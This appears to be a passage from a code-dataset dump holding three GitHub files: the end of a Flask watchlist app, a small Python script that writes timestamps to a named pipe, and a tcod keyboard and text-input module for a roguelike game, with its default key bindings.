watchlist_display_name=watchlist_display_name,\n shows=arrowverse_shows,\n episodes=arrowverse_episodes\n )\n\n@app.route('/save_watchlist', methods=['POST'])\ndef save_watchlist():\n \"\"\"\n POST endpoint to save a watchlist.\n\n Parameters:\n None\n Returns:\n str: A redirect to the index route.\n \"\"\"\n\n json_data: Any = request.get_json()\n\n if json_data is None:\n return redirect(url_for('index'))\n\n # if the watchlist_uuid is not in the JSON payload\n if 'watchlist_uuid' not in json_data:\n return redirect(url_for('index'))\n\n # if the watchlist_uuid is not a string\n if type(json_data['watchlist_uuid']) != str:\n return redirect(url_for('index'))\n\n # if the watchlist_uuid is empty\n if len(json_data['watchlist_uuid']) == 0:\n return redirect(url_for('index'))\n\n watchlist_uuid: str = json_data['watchlist_uuid']\n\n valid_display_name: bool = True\n\n # if the watchlist_display_name is not in the JSON payload\n if 'watchlist_display_name' not in json_data:\n valid_display_name = False\n\n # elif guards avoid a KeyError when the key is absent\n # if the watchlist_display_name is not a string\n elif type(json_data['watchlist_display_name']) != str:\n valid_display_name = False\n\n # if the watchlist_display_name is empty\n elif len(json_data['watchlist_display_name']) == 0:\n valid_display_name = False\n\n watchlist_display_name: str = \"My Watchlist\"\n\n if valid_display_name:\n watchlist_display_name: str = json_data['watchlist_display_name']\n\n episode_watch_states: list[EpisodeWatchState] = []\n\n # loop through episode_watch_states attribute in the JSON payload\n for episode_watch_state in json_data['episode_watch_states']:\n state = EpisodeWatchState(\n episode_id=episode_watch_state['episode_id'],\n watched=episode_watch_state['watched']\n )\n episode_watch_states.append(state)\n\n add_episodes(watchlist_uuid, watchlist_display_name, episode_watch_states)\n\n return redirect(url_for('index'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"jonesjacklewis/FlaskArrowverse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39561417032","text":"import os, time, sys\nfrom datetime import datetime\n\nnombre_fifo = '/tmp/ped1_group1Date'\n\nif not os.path.exists(nombre_fifo):\n 
os.mkfifo(nombre_fifo)\n\nfifo_escritura = os.open(nombre_fifo, os.O_WRONLY)\nwhile True:\n hora = datetime.now()\n mensaje = hora.strftime(\"%d/%m/%Y %H:%M:%S\\n\")\n os.write(fifo_escritura, mensaje.encode('utf8'))\n time.sleep(1)\n\n","repo_name":"kike454/examenPED","sub_path":"practicasVerdaderas/p3Enrique/p3/serv.py","file_name":"serv.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37063854249","text":"'''\r\n orangIO\r\n (Orange I/O)\r\n An input/output extension for tcod Python\r\n \r\n Softly Into the Night, a sci-fi/Lovecraftian roguelike\r\n Copyright (C) 2020 Jacob Wharton.\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <https://www.gnu.org/licenses/>.\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n Alpha: This module is currently in Alpha mode\r\n It is usable but not very user-friendly,\r\n and has a lot of dependencies.\r\n\r\n This extension to tcod allows you to easily do:\r\n - key commands with any combination of Shift, Ctrl, and Alt\r\n - text input with blinking cursor\r\n - \"waiting\" for a certain input\r\n\r\n How to use this module:\r\n\r\n Call init_keyBindings during the initialization of your game.\r\n Use the key_get* wrapper functions to interface with the keyboard input.\r\n The handle_mousekeys function is the function that allows commands\r\n with any combination of Ctrl, Shift and Alt.\r\n - To use this function in your game,\r\n modify COMMANDS and key_bindings.txt defaults.\r\n Call the get_raw_input wrapper function to\r\n wrap the tcod key and mouse objects in a tuple.\r\n key_bindings.txt\r\n To edit key bindings, refer to the comments on key_bindings.txt\r\n To change the directory of key_bindings.txt, change the variable\r\n \"file_keyBindings\"\r\n\r\n Example use for key combo inputs:\r\n \r\n # get input #\r\n pcInput=IO.get_raw_input()\r\n pcAct=IO.handle_mousekeys(pcInput).items()\r\n \r\n # process commands #\r\n for act,arg in pcAct:\r\n if act == \"lclick\":\r\n mousex,mousey,z = arg #unpack command arguments\r\n #...\r\n if act == \"move\":\r\n dx,dy,dz = arg #unpack command arguments\r\n #...\r\n \r\n \r\n'''\r\n\r\n\r\nimport os\r\nimport tcod\r\nimport time\r\nimport textwrap\r\n\r\nfrom const import *\r\nimport managers \r\nimport maths\r\nimport word\r\n\r\n\r\n\r\n #colors\r\nWHITE=tcod.Color(255,255,255)\r\nBLACK=tcod.Color(0,0,0)\r\n\r\n #global key and mouse handlers for all objects in OrangIO\r\nkey = tcod.Key()\r\nmouse = tcod.Mouse()\r\n\r\n#this value is the number of alternate key codes for each command.\r\n #the number of key codes for each command in key_bindings.txt\r\n #MUST MATCH THIS VALUE.\r\nNUM_ALT_CMDS = 3\r\n\r\n\r\n#directory of \"key_bindings.txt\"\r\nfile_keyBindings=os.path.join(\r\n os.path.curdir,os.path.pardir,\"settings\",\"key_bindings.txt\")\r\n\r\n'''###\r\n#key_bindings.txt\r\n #This is the backup key bindings 
file\r\n\r\n #To add a new command into the game, add it into the key_bindings.txt\r\n #defaults below. Add Shift+ or Ctrl+ or Alt+ or any combo thereof.\r\n #Delete the key_bindings.txt file from the game's directory to\r\n #have the game recreate it using the defaults.\r\n # - Do not use spaces.\r\n # - To use special keys, including spacebar:\r\n refer to the TEXT_TO_KEY dict.\r\n # - Take note of the placement you put the command into the text file.\r\n #Put that command into the dict COMMANDS in the SAME ORDER that you put\r\n #it into key_bindings.\r\n # - Put the command into player.commands or player.const_commands.\r\n # (If using this as a third party module, simply run\r\n # handle_mousekeys and check that the result == the desired command)\r\n \r\n#if you add new commands you must add new key bindings for those commands.\r\n#key bindings begin on a new line,\r\n #and consist of any combination of the following:\r\n #Ctrl+\r\n #Shift+\r\n #Alt+\r\n #followed by a key constant as defined in TEXT_TO_KEY\r\n #or a letter/number/symbol on the keyboard.\r\n #ALERT: To get the ? key:\r\n #do the key combination Shift+/ instead of ?\r\n #IN GENERAL, only use the lowercase keys and indicate Shift+\r\n #in order to indicate that the uppercase character should be used.\r\n #Example: to make a command respond to the command \">\",\r\n #the command must be written as Shift+.\r\n #(shift+ period key)\r\n #Note: NumPad is not currently supported. NumPad must be OFF during play.\r\n #Note: commands are not case-sensitive.\r\n###'''\r\n\r\nKEYBINDINGS_TEXT_DEFAULT = '''//file name: {filename}\r\n\r\n//These are comments.\r\n// All empty lines, and all lines beginning with \"//\"\r\n// (without quotations), are considered to be comments\r\n// by the file reader, and are ignored.\r\n\r\n// --- Key Bindings Information ---\r\n\r\n//In order to remove one binding, set it to: NONE \r\n//Bindings may begin with any combination of shift, ctrl,\r\n// and alt, followed by a plus (+) symbol:\r\n// \"Shift+\" OR \"Ctrl+\" OR \"Alt+\"\r\n//Keypad numbers begin with \"KP\" e.g. 
\"KP5\"\r\n\r\n//Example key bindings\r\n// (note bindings are case-insensitive):\r\n// CTRL+ALT+DELETE\r\n// shift+=\r\n// f\r\n// Ctrl+A\r\n// none\r\n// None\r\n// KP8\r\n\r\n//The action bound to the last combo will function if and\r\n// only if the a button is pressed WHILE the Ctrl button\r\n// is being held, and neither Alt nor Shift are also being\r\n// pressed down; if the Alt button is also being held, for\r\n// instance, the input will be treated as \"Ctrl+Alt+a\",\r\n// which is different from \"Ctrl+a\".\r\n\r\n//Note:\r\n// Left and right Ctrl are treated as the same.\r\n// Left and right Alt are treated as the same.\r\n// Left and right Shift are treated as the same.\r\n\r\n//ALERT: NumLock is currently unsupported.\r\n// The numpad keys might not work as expected with NumLock on.\r\n// Keep NumLock off during play.\r\n\r\n//---------\\\\\r\n// Bindings |\r\n//---------//\r\n\r\n// display commands / help\r\nShift+/\r\nNONE\r\nNONE\r\n\r\n// North\r\nK\r\nKP8\r\nNONE\r\n\r\n// West\r\nH\r\nKP4\r\nNONE\r\n\r\n// South\r\nJ\r\nKP2\r\nNONE\r\n\r\n// East\r\nL\r\nKP6\r\nNONE\r\n\r\n// Northwest\r\nY\r\nKP7\r\nNONE\r\n\r\n// Southwest\r\nB\r\nKP1\r\nNONE\r\n\r\n// Southeast\r\nN\r\nKP3\r\nNONE\r\n\r\n// Northeast\r\nU\r\nKP9\r\nNONE\r\n\r\n// Direct Towards Self\r\n.\r\nKP5\r\nNONE\r\n\r\n// up\r\nShift+,\r\nNONE\r\nNONE\r\n\r\n// down\r\nShift+.\r\nNONE\r\nNONE\r\n\r\n// context-sensitive action\r\nSPACE\r\nNONE\r\nNONE\r\n\r\n// chat | talk | speak\r\nc\r\nNONE\r\nNONE\r\n\r\n// target entity (+ target limbs) to fire / throw / attack\r\nt\r\nNONE\r\nNONE\r\n\r\n// move prompt\r\nm\r\nNONE\r\nNONE\r\n\r\n// attack prompt\r\nx\r\nNONE\r\nNONE\r\n\r\n// shoot ranged weapon\r\nf\r\nNONE\r\nNONE\r\n\r\n// throw missile\r\nshift+t\r\nNONE\r\nNONE\r\n\r\n// get item (pickup & place in inventory)\r\ng\r\n,\r\nNONE\r\n\r\n// grab item (pickup item & hold in hand)\r\nctrl+,\r\nNONE\r\nNONE\r\n\r\n// grapple (grab foe's limbs, etc.)\r\nctrl+g\r\nNONE\r\nNONE\r\n\r\n// open/Close\r\no\r\nNONE\r\nNONE\r\n\r\n// close\r\nShift+=\r\nNONE\r\nNONE\r\n\r\n// open\r\n-\r\nNONE\r\nNONE\r\n\r\n// inventory\r\ni\r\nNONE\r\nNONE\r\n\r\n// abilities menu\r\nTab\r\nNONE\r\nNONE\r\n\r\n// equipment menu\r\ne\r\nNONE\r\nNONE\r\n\r\n// change body position or stance (crouch, stand, lie prone, etc.)\r\np\r\nNONE\r\nNONE\r\n\r\n// change movement speed (walking, running, sprinting, etc.)\r\ns\r\nNONE\r\nNONE\r\n\r\n// speed up movement speed\r\nShift+s\r\nNONE\r\nNONE\r\n\r\n// slow down movement speed\r\nCtrl+s\r\nNONE\r\nNONE\r\n\r\n// examine or Look\r\n/\r\nShift+L\r\nNONE\r\n\r\n// wait\r\nw\r\nCtrl+t\r\nNONE\r\n\r\n// rest\r\nr\r\nNONE\r\nNONE\r\n\r\n// move view\r\nv\r\nNONE\r\nNONE\r\n\r\n// fixed view mode\r\nCtrl+v\r\nNONE\r\nNONE\r\n\r\n// show player location (find player)\r\nCtrl+f\r\nNONE\r\nNONE\r\n\r\n// show message history\r\nShift+h\r\nNONE\r\nNONE\r\n\r\n// show character page\r\na\r\nShift+c\r\nNONE\r\n\r\n// quit game\r\nAlt+q\r\nNONE\r\nNONE\r\n\r\n//---------\\\\\r\n// MENUS |\r\n//---------//\r\n\r\n// Menu Up\r\nUP\r\nNONE\r\nNONE\r\n\r\n// Menu Left\r\nLEFT\r\nNONE\r\nNONE\r\n\r\n// Menu Down\r\nDOWN\r\nNONE\r\nNONE\r\n\r\n// Menu Right\r\nRIGHT\r\nNONE\r\nNONE\r\n\r\n// Select\r\nSPACE\r\nENTER\r\nNONE\r\n\r\n// Exit\r\nESCAPE\r\nNONE\r\nNONE\r\n\r\n// Page Up\r\nPAGEUP\r\nNONE\r\nNONE\r\n\r\n// Page Down\r\nPAGEDOWN\r\nNONE\r\nNONE\r\n\r\n// Home\r\nHOME\r\nNONE\r\nNONE\r\n\r\n// End\r\nEND\r\nNONE\r\nNONE\r\n\r\n// Delete\r\nDELETE\r\nNONE\r\nNONE\r\n\r\n// 
Insert\r\nINSERT\r\nNONE\r\nNONE\r\n\r\n// Backspace\r\nBACKSPACE\r\nNONE\r\nNONE\r\n\r\n//---------\\\\\r\n// ADVANCED |\r\n//---------//\r\n\r\n// Shell / command prompt / console\r\nCtrl+`\r\nNONE\r\nNONE\r\n\r\n// Execute last console command (during play)\r\nCtrl+Shift+`\r\nNONE\r\nNONE\r\n\r\n// \r\n\r\n//\r\n'''.format(filename=file_keyBindings)\r\n\r\n'''\r\n# IMPORTANT!!\r\n# Order of commands must match order in the key_bindings.txt file. #\r\n'''\r\nCOMMANDS = { # translate commands into actions\r\n\r\n 'help' : {'help': True}, # CHANGED ORDERING, TEST TO MAKE SURE IT STILL WORKS.\r\n 'north' : {'context-dir': (0, -1, 0,) },\r\n 'west' : {'context-dir': (-1, 0, 0,) },\r\n 'south' : {'context-dir': (0, 1, 0,) },\r\n 'east' : {'context-dir': (1, 0, 0,) },\r\n 'northwest' : {'context-dir': (-1, -1, 0,) },\r\n 'southwest' : {'context-dir': (-1, 1, 0,) },\r\n 'southeast' : {'context-dir': (1, 1, 0,) },\r\n 'northeast' : {'context-dir': (1, -1, 0,) },\r\n 'self' : {'context-dir': (0, 0, 0,) },\r\n 'up' : {'context-dir': (0, 0, -1,) },\r\n 'down' : {'context-dir': (0, 0, 1,) },\r\n 'context' : {'context': True},\r\n 'chat-context' : {'chat-context': True},\r\n 'target-prompt' : {'target-prompt': True},\r\n 'move-prompt' : {'move-prompt': True},\r\n 'attack-prompt' : {'attack-prompt': True},\r\n 'shoot-prompt' : {'shoot-prompt': True},\r\n 'throw-prompt' : {'throw-prompt': True},\r\n 'get-prompt' : {'get-prompt': True},\r\n 'grabitem-prompt':{'grabitem-prompt': True},\r\n 'grapple-prompt': {'grapple-prompt': True},\r\n 'openclose-prompt':{'openclose-prompt': True},\r\n 'close-prompt' : {'close-prompt': True},\r\n 'open-prompt' : {'open-prompt': True},\r\n 'inventory' : {'inventory': True},\r\n 'abilities' : {'abilities': True},\r\n 'equipment' : {'equipment': True},\r\n 'change-pos' : {'change-pos': True},\r\n 'change-msp' : {'change-msp': True},\r\n 'msp-up' : {'msp-up': True},\r\n 'msp-down' : {'msp-down': True},\r\n 'look' : {'look': True},\r\n 'wait' : {'wait': True},\r\n 'rest' : {'rest': True},\r\n 'move view' : {'move view': True},\r\n 'fixed view' : {'fixed view': True},\r\n 'find player' : {'find player': True},\r\n 'msg history' : {'message history': True},\r\n 'char page' : {'character page': True},\r\n 'quit' : {'quit game': True},\r\n\r\n 'menu-up' : {'menu-nav': (0, -1, 0,) },\r\n 'menu-left' : {'menu-nav': (-1, 0, 0,) },\r\n 'menu-down' : {'menu-nav': (0, 1, 0,) },\r\n 'menu-right' : {'menu-nav': (1, 0, 0,) },\r\n 'select' : {'select': True},\r\n 'exit' : {'exit': True},\r\n 'pgup' : {'page up': True},\r\n 'pgdn' : {'page down': True},\r\n 'home' : {'home': True},\r\n 'end' : {'end': True},\r\n 'delete' : {'delete': True},\r\n 'insert' : {'insert': True},\r\n 'backspace' : {'backspace': True},\r\n \r\n 'console' : {'console': True},\r\n 'last cmd' : {'last cmd': True},\r\n}\r\n\r\n#-----------------------------------------------------------#\r\nTEXT_TO_KEY = { # translate text into key constants\r\n 'none' : -1,\r\n 'kp0' : tcod.KEY_KP0,\r\n 'kp1' : tcod.KEY_KP1,\r\n 'kp2' : tcod.KEY_KP2,\r\n 'kp3' : tcod.KEY_KP3,\r\n 'kp4' : tcod.KEY_KP4,\r\n 'kp5' : tcod.KEY_KP5,\r\n 'kp6' : tcod.KEY_KP6,\r\n 'kp7' : tcod.KEY_KP7,\r\n 'kp8' : tcod.KEY_KP8,\r\n 'kp9' : tcod.KEY_KP9,\r\n 'up' : tcod.KEY_UP,\r\n 'down' : tcod.KEY_DOWN,\r\n 'right' : tcod.KEY_RIGHT,\r\n 'left' : tcod.KEY_LEFT,\r\n 'space' : tcod.KEY_SPACE,\r\n 'tab' : tcod.KEY_TAB,\r\n 'enter' : tcod.KEY_ENTER,\r\n 'escape' : tcod.KEY_ESCAPE,\r\n 'backspace' : tcod.KEY_BACKSPACE,\r\n 'insert' : tcod.KEY_INSERT,\r\n 'delete' 
: tcod.KEY_DELETE,\r\n 'home' : tcod.KEY_HOME,\r\n 'end' : tcod.KEY_END,\r\n 'pagedown' : tcod.KEY_PAGEDOWN,\r\n 'pageup' : tcod.KEY_PAGEUP,\r\n 'f1' : tcod.KEY_F1,\r\n 'f2' : tcod.KEY_F2,\r\n 'f3' : tcod.KEY_F3,\r\n 'f4' : tcod.KEY_F4,\r\n 'f5' : tcod.KEY_F5,\r\n 'f6' : tcod.KEY_F6,\r\n 'f7' : tcod.KEY_F7,\r\n 'f8' : tcod.KEY_F8,\r\n 'f9' : tcod.KEY_F9,\r\n 'f10' : tcod.KEY_F10,\r\n 'f11' : tcod.KEY_F11,\r\n 'f12' : tcod.KEY_F12,\r\n}\r\nVK_TO_CHAR = { # translate key consants into a char\r\n tcod.KEY_KP0 : '0',\r\n tcod.KEY_KP1 : '1',\r\n tcod.KEY_KP2 : '2',\r\n tcod.KEY_KP3 : '3',\r\n tcod.KEY_KP4 : '4',\r\n tcod.KEY_KP5 : '5',\r\n tcod.KEY_KP6 : '6',\r\n tcod.KEY_KP7 : '7',\r\n tcod.KEY_KP8 : '8',\r\n tcod.KEY_KP9 : '9',\r\n tcod.KEY_KPDEC : '.',\r\n \r\n tcod.KEY_UP : chr(K_UP),\r\n tcod.KEY_DOWN : chr(K_DOWN),\r\n tcod.KEY_RIGHT : chr(K_RIGHT),\r\n tcod.KEY_LEFT : chr(K_LEFT),\r\n tcod.KEY_BACKSPACE : chr(K_BACKSPACE),\r\n tcod.KEY_DELETE : chr(K_DELETE),\r\n tcod.KEY_INSERT : chr(K_INSERT),\r\n tcod.KEY_PAGEUP : chr(K_PAGEUP),\r\n tcod.KEY_PAGEDOWN : chr(K_PAGEDOWN),\r\n tcod.KEY_HOME : chr(K_HOME),\r\n tcod.KEY_END : chr(K_END),\r\n tcod.KEY_ENTER : chr(K_ENTER),\r\n tcod.KEY_KPENTER : chr(K_ENTER),\r\n tcod.KEY_ESCAPE : chr(K_ESCAPE),\r\n}\r\n\r\n\r\n\r\n\r\n\r\n#-----------#\r\n# classes #\r\n#-----------#\r\n\r\n\r\n#\r\n# cursor\r\n#\r\n \r\nclass Cursor:\r\n \r\n def __init__(self,x=0,y=0,rate=0.3):\r\n self.set_pos(x,y)\r\n self.time_stamp = 0\r\n self.blink_time = rate\r\n \r\n def set_pos(self,x,y): self._x = x; self._y = y;\r\n def draw(self,con=0): console_invert_color(con,self.x,self.y)\r\n \r\n def blink(self):\r\n if time.time() - self.time_stamp > self.blink_time:\r\n self.blink_reset_timer_off()\r\n return True\r\n else: return False\r\n \r\n def blink_reset_timer_off(self):\r\n self.time_stamp = time.time()\r\n def blink_reset_timer_on(self):\r\n self.time_stamp = 0\r\n \r\n @property\r\n def x(self): return self._x\r\n @property\r\n def y(self): return self._y\r\n\r\n\r\n#\r\n# Text Input Manager\r\n#\r\n#\r\n\r\n# Display user-entered text field with blinking cursor\r\n# and handle all processes thereof.\r\n\r\n# key bindings should NEVER affect input for this function.\r\n# that got nasty real fast in Caves of Qud...\r\n\r\n#---------------Args----------------#\r\n# int x,y location on screen\r\n# int w,h width and height of textbox\r\n# string default text that appears when textbox is created\r\n# string mode 'text' or 'wait' :\r\n# - text mode: normal input mode, returns text when Enter key pressed\r\n# - wait mode: returns first accepted key press input\r\n# bool insert begin in \"insert\" mode?\r\n#\r\n\r\nclass TextInputManager(managers.Manager): #Manager_Input | ManagerInput\r\n \r\n def __init__(self, x,y, w,h, default,mode,insert):\r\n \r\n # init\r\n self.console = tcod.console_new(w, h)\r\n self.init_time = time.time()\r\n \r\n self.x=x\r\n self.w=w\r\n self.y=y\r\n self.h=h\r\n self.mode=mode\r\n self.text=\"\" if mode==\"wait\" else default\r\n self.default=default\r\n \r\n self.keyInput=''\r\n \r\n self.redraw_cursor = True\r\n self.render_text = True\r\n self.flush = False\r\n \r\n self.key=key\r\n self.mouse=mouse\r\n \r\n self.cursor=Cursor()\r\n self.cursor.set_pos(x,y)\r\n self.insert_mode=insert #replace the character under the cursor or shift it aside?\r\n \r\n #ignore buffer\r\n get_raw_input()\r\n\r\n\r\n def set_result(self,val):\r\n if val == '': val=self.default\r\n if val == '': val='0'\r\n elif val == '\\x1c': val='0'\r\n 
super(TextInputManager,self).set_result(val)\r\n \r\n def run(self):\r\n super(TextInputManager, self).run()\r\n \r\n## # manually close game #\r\n## if libtcod.console_is_window_closed():\r\n## #sys.exit() # no, there should be a custom exit func\r\n \r\n tcod.sys_sleep_milli(5) #reduce CPU usage\r\n \r\n self.update()\r\n \r\n tcod.sys_check_for_event( # check don't wait.\r\n tcod.EVENT_KEY\r\n | tcod.EVENT_MOUSE_PRESS # we only want to know mouse press\r\n | tcod.EVENT_MOUSE_RELEASE, # or release, NOT mouse move event.\r\n self.key, self.mouse)\r\n \r\n self.get_char()\r\n self.mouse_events()\r\n self.keyboard_events()\r\n \r\n def close(self):\r\n ##do not inherit\r\n tcod.console_delete(self.console)\r\n \r\n def update(self):\r\n \r\n self.flush=False\r\n \r\n if self.cursor.blink():\r\n self.redraw_cursor=True\r\n \r\n if self.render_text:\r\n self.update_render_text()\r\n self.redraw_cursor=True\r\n \r\n if self.redraw_cursor:\r\n self.cursor.draw()\r\n self.flush=True\r\n \r\n if self.flush:\r\n tcod.console_flush()\r\n\r\n #now we've updated, turn all update variables to False\r\n self.redraw_cursor =False\r\n self.render_text =False\r\n self.flush =False\r\n\r\n def keyboard_events(self):\r\n \r\n if self.keyInput:\r\n\r\n if self.mode == \"wait\": # CHANGED. Was just self.set_result(self.keyInput). Test that all Input() uses are still working properly using \"wait\" mode.\r\n if (ord(self.keyInput) == K_ESCAPE):\r\n self.set_result(self.default)\r\n else:\r\n self.set_result(self.keyInput)\r\n\r\n self.redraw_cursor=True\r\n self.cursor_blinkOn()\r\n\r\n if self.mode == \"text\":\r\n self.input_vk()\r\n self.input_text()\r\n\r\n def mouse_events(self):\r\n \r\n if self.mouse.lbutton_pressed:\r\n self.cursor_blinkOn()\r\n self.putCursor(self.mouse.cx - self.x)\r\n self.blit_console()\r\n self.flush=True\r\n\r\n\r\n def input_vk(self):\r\n \r\n if not tcod.console_is_key_pressed(self.key.vk):\r\n return\r\n\r\n cpos=self.cursor_pos\r\n ans=ord(self.keyInput)\r\n\r\n # returning a result\r\n if (ans == K_ENTER): self.set_result(self.text)\r\n if (ans == K_ESCAPE): self.set_result(self.default)\r\n\r\n # deleting\r\n if (ans == K_BACKSPACE) :\r\n self.render_text=True\r\n self.putCursor(cpos - 1)\r\n self.delete()\r\n elif (ans == K_DELETE) :\r\n self.render_text=True\r\n self.delete()\r\n # moving\r\n elif (ans == K_LEFT) : self.move(cpos - 1)\r\n elif (ans == K_RIGHT) : self.move(cpos + 1)\r\n \r\n # insert mode\r\n elif (ans == K_INSERT) : self.insert_mode = not self.insert_mode\r\n\r\n\r\n def input_text(self):\r\n\r\n if not self.key.vk == tcod.KEY_TEXT:\r\n return\r\n \r\n ans=self.keyInput\r\n if self.cursor_pos < len(self.text): # insert or replace\r\n self.render_text=True\r\n first_half = self.text[:self.cursor_pos]\r\n second_half = self.text[self.insert_mode + self.cursor_pos:]\r\n self.text='{}{}{}'.format(first_half, ans, second_half)\r\n else: # append\r\n self.text += ans\r\n self.put_next_char(ans)\r\n self.blit_console()\r\n self.flush=True\r\n\r\n # truncate\r\n if (len(self.text) > self.w):\r\n self.text = self.text[:self.w]\r\n \r\n # move cursor\r\n self.putCursor(self.cursor_pos + 1)\r\n #\r\n\r\n\r\n def move(self, new):\r\n tcod.console_set_char_foreground(\r\n 0, self.x + self.cursor_pos, self.y, WHITE)\r\n tcod.console_set_char_background(\r\n 0, self.x + self.cursor_pos, self.y, BLACK)\r\n self.flush=True\r\n self.putCursor(new)\r\n\r\n def update_render_text(self):\r\n tcod.console_clear(self.console)\r\n tcod.console_print_ex(\r\n self.console,0,0,\r\n 
tcod.BKGND_NONE,tcod.LEFT,\r\n self.text )\r\n self.blit_console()\r\n \r\n def get_char(self):\r\n reply=''\r\n if tcod.console_is_key_pressed(self.key.vk):\r\n reply = VK_TO_CHAR.get(self.key.vk, None)\r\n \r\n elif self.key.vk == tcod.KEY_TEXT:\r\n tx = self.key.text #.decode()\r\n if (ord(tx) >= 128 or tx == '%'):\r\n return '' # Prevent problem-causing input\r\n else: reply=tx\r\n self.keyInput=reply\r\n\r\n def delete(self):\r\n self.text=self.text[:self.cursor_pos] + self.text[1+self.cursor_pos:]\r\n \r\n def put_next_char(self,new):\r\n tcod.console_put_char_ex(\r\n self.console, self.cursor_pos,0, new,\r\n WHITE,BLACK\r\n )\r\n def blit_console(self):\r\n tcod.console_blit(\r\n self.console, 0,0,self.w,self.h,\r\n 0, self.x,self.y\r\n ) \r\n '''def ignore_buffer(self):\r\n return (time.time() - self.init_time < .05)'''\r\n def putCursor(self,new):\r\n pos=maths.restrict( new, 0, min(self.w - 1, len(self.text)) )\r\n self.cursor.set_pos(self.x + pos, self.y)\r\n def cursor_blinkOn(self): self.cursor.blink_reset_timer_on()\r\n \r\n @property\r\n def cursor_pos(self): return self.cursor.x\r\n\r\n\r\n#--------------------------------------------------#\r\n\r\n\r\n\r\n\r\n#-----------#\r\n# functions #\r\n#-----------#\r\n\r\n# help page\r\ndef render_help() -> str: # may not display all commands\r\n return ''' ~~~~~ Help / Command List ~~~~~\r\n\r\nCommand =================== Default Key Combo\r\n\r\n ~~~~~ Global commands ~~~~~\r\nshow this help page ======= Shift+/\r\n\r\n ~~~~~ Movement controls ~~~~~\r\n# Default movement controls use vim keys or keypad numbers\r\n\r\nnorth ===================== k -or- keypad 8\r\nwest ====================== h -or- keypad 4\r\nsouth ===================== j -or- keypad 2\r\neast ====================== l -or- keypad 6\r\nnorthwest ================= y -or- keypad 7\r\nsouthwest ================= b -or- keypad 1\r\nsoutheast ================= n -or- keypad 3\r\nnortheast ================= u -or- keypad 9\r\ntowards self ============== . -or- keypad 5\r\nup ======================== Shift+,\r\ndown ====================== Shift+.\r\n\r\n ~~~~~ Basic controls ~~~~~\r\nperform action ============ Space\r\n\r\n ~~~~~ Movement controls ~~~~~\r\n\r\n'''\r\n\r\n\r\n#key functions\r\ndef key_getchar(k):\r\n '''\r\n # we add 256 here to differentiate character (text) codes from\r\n # special key codes, like NumLock, which happens to have the same\r\n # integer code (62) as > (greater than symbol), for example.\r\n '''\r\n return k + 256\r\ndef key_get_pressed(): # get both vk and text in one variable\r\n k = tcod.KEY_NONE\r\n if tcod.console_is_key_pressed(key.vk) : k = key.vk \r\n if k == tcod.KEY_CHAR : k = key_getchar(key.c)\r\n return k\r\ndef key_get_special_combo(k): # combine shift,ctrl,alt, and key press\r\n shift = key.shift\r\n ctrl = (key.lctrl or key.rctrl)\r\n alt = (key.lalt or key.ralt )\r\n return (k, (shift, ctrl, alt,),)\r\n\r\n# files #\r\n\r\n#is line a \"comment\"? 
Return whether string line should be ignored.\r\ndef file_is_line_comment(line):\r\n return ((line[0]=='/' and line[1]=='/') or line[0]=='\\n')\r\n\r\n# tcod #\r\n\r\ndef color_invert(rgb):\r\n return tcod.Color(255-rgb[0],255-rgb[1],255-rgb[2])\r\ndef console_invert_color(con,x,y):\r\n col1 = tcod.console_get_char_foreground(con,x,y)\r\n col2 = tcod.console_get_char_background(con,x,y)\r\n tcod.console_set_char_foreground(con, x,y, color_invert(col1))\r\n tcod.console_set_char_background(con, x,y, color_invert(col2))\r\n\r\n#\r\n#\r\n# get raw input\r\n#\r\n# checks for input\r\n# returns key and mouse objects in a tuple\r\n#\r\ndef get_raw_input():\r\n tcod.sys_sleep_milli(1) # prevent from checking a billion times/second to reduce CPU usage\r\n\r\n # we use the check_for_event instead of the wait_for_event function\r\n # because wait_for_event causes lots of problems\r\n tcod.sys_check_for_event(\r\n tcod.EVENT_KEY\r\n | tcod.EVENT_MOUSE_PRESS # we only want to know mouse press\r\n | tcod.EVENT_MOUSE_RELEASE, # or release, NOT mouse move event.\r\n key, mouse)\r\n return (key,mouse,)\r\n#\r\n#\r\n# handle_mousekeys\r\n#\r\n# convert keyboard and mouse input into player commands\r\n# and return the command as a dict\r\n#\r\ndef handle_mousekeys(keymouse):\r\n key,mouse=keymouse\r\n \r\n # Mouse #\r\n\r\n if mouse.lbutton_pressed: return {'lclick': (mouse.cx,mouse.cy,0,) }\r\n if mouse.rbutton_pressed: return {'rclick': (mouse.cx,mouse.cy,0,) }\r\n \r\n # Keys #\r\n \r\n k = key_get_pressed()\r\n combined = key_get_special_combo(k)\r\n \r\n return COMMANDS.get(bind.get(combined, None), {})\r\n\r\n#Input\r\n#wrapper function to get a simple input from the user\r\ndef Input(x,y, w=1,h=1, default='',mode='text',insert=False):\r\n manager=TextInputManager(x,y, w,h, default,mode,insert)\r\n result=None\r\n while not result:\r\n manager.run()\r\n result=manager.result\r\n manager.close()\r\n return result\r\n\r\n#\r\n# key bindings\r\n#\r\n\r\nbind={}\r\nNO_KEY=(-1,(False,False,False,),) # NULL key constant\r\n\r\n# init_keyBindings\r\n# call during setup to initialize the keyboard controls\r\ndef init_keyBindings():\r\n try:\r\n _init_keyBindings()\r\n except FileNotFoundError:\r\n print(\"'key_bindings.txt' file not found. 
